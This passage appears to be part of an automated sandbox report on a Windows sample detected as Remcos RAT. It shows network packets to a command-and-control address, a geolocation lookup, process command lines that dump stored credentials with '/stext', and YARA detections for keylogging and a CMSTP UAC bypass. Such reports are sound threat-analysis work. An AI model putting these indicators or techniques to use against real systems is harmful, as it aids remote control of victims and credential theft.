Jan 10, 2025 19:17:43.637434006 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637449980 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637450933 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637469053 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637484074 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637502909 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637511969 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637523890 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637528896 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637546062 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637562990 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637578964 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637579918 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637597084 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637604952 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637614965 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637625933 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637633085 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637650967 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637706041 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637720108 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637734890 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637751102 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637765884 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637772083 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637783051 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637795925 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637814045 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637861967 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637895107 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637911081 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637917995 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637927055 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637943983 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637952089 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637965918 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.637967110 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.637989998 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638008118 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638008118 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638029099 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638032913 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638055086 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638072014 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638073921 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638094902 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638097048 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638112068 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638128042 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638151884 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638161898 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638168097 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638189077 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638190031 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638214111 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638220072 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638236046 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638251066 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638273954 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638282061 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638290882 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638307095 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638324022 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638329983 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638344049 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638351917 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638365984 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638369083 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638377905 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638389111 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638401031 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638416052 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638421059 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638427973 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638441086 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638443947 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638453007 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638463974 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638468027 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638479948 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638494015 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638506889 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638506889 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638525009 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638540983 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638566017 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638576984 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638592005 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638602972 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638612986 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638638973 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638732910 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638757944 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638777971 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638783932 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638788939 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638801098 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638813019 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638823032 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638824940 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638838053 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638848066 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638853073 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638859987 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638871908 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638874054 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638885021 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638897896 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638897896 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638916016 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638931036 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638933897 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.638943911 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638958931 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638967037 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.638972044 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.639005899 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.639028072 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.668354034 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.681957006 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.681968927 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.681981087 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.682014942 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.682024956 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.682035923 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.682041883 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.682135105 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.682135105 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.682136059 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737179041 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737231016 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737251043 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737267017 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737282038 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737294912 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737308025 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737377882 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737390041 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737401009 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737413883 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737426043 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737425089 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737426043 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737426043 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737426043 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737508059 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737521887 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737524986 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737524986 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737541914 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737581015 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737677097 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737694979 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737706900 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737718105 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737731934 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737742901 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737751007 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737766981 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737773895 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737780094 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737786055 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737787962 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737792015 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737807989 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737817049 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737838030 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737849951 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737849951 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737862110 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:43.737874985 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737901926 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:43.737942934 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:44.120187044 CET	80	49747	178.237.33.50	192.168.2.10
Jan 10, 2025 19:17:44.120250940 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:17:44.175467968 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:44.180260897 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:45.119069099 CET	80	49747	178.237.33.50	192.168.2.10
Jan 10, 2025 19:17:45.122370005 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:17:46.050901890 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:46.055834055 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055846930 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055855036 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055876017 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055912971 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:46.055927038 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055937052 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055953979 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:46.055980921 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.055990934 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.056030035 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.056039095 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060741901 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060750961 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060842037 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060847044 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060872078 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060882092 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.060890913 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.105874062 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:17:46.110820055 CET	3678	49739	192.210.150.26	192.168.2.10
Jan 10, 2025 19:17:46.110889912 CET	49739	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:18:00.525579929 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:18:00.528873920 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:18:00.533795118 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:18:30.528100014 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:18:30.529743910 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:18:30.534559011 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:19:00.526582003 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:19:00.527920961 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:19:00.532740116 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:19:30.527508974 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:19:30.531562090 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:19:30.536456108 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:19:33.420393944 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:33.888572931 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:34.497920036 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:35.701035023 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:38.201195002 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:43.091708899 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:19:52.701088905 CET	49747	80	192.168.2.10	178.237.33.50
Jan 10, 2025 19:20:00.542376041 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:20:00.548682928 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:20:00.553602934 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:20:30.541950941 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:20:30.544321060 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:20:30.549148083 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:21:00.542292118 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:21:00.543818951 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:21:00.548567057 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:21:30.655201912 CET	3678	49735	192.210.150.26	192.168.2.10
Jan 10, 2025 19:21:30.658389091 CET	49735	3678	192.168.2.10	192.210.150.26
Jan 10, 2025 19:21:30.663214922 CET	3678	49735	192.210.150.26	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:17:43.458982944 CET	63599	53	192.168.2.10	1.1.1.1
Jan 10, 2025 19:17:43.465934992 CET	53	63599	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:17:43.458982944 CET	192.168.2.10	1.1.1.1	0x156e	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:17:43.465934992 CET	1.1.1.1	192.168.2.10	0x156e	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49747	178.237.33.50	80	7792	C:\Users\user\AppData\Local\misruling\Graff.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:17:43.519511938 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jan 10, 2025 19:17:44.120187044 CET	1171	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:17:44 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Target ID:	0
Start time:	13:17:34
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\bwYw3UUfy7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bwYw3UUfy7.exe"
Imagebase:	0x730000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:17:38
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bwYw3UUfy7.exe"
Imagebase:	0x870000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:17:43
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\molcoacbwimigbrwpmuqe"
Imagebase:	0x870000
File size:	962'048 bytes
MD5 hash:	B596EDF7EBFB3A944A94685A207677BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:17:43
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\misruling\Graff.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"
Imagebase:	0x870000
File size:	962'048 bytes
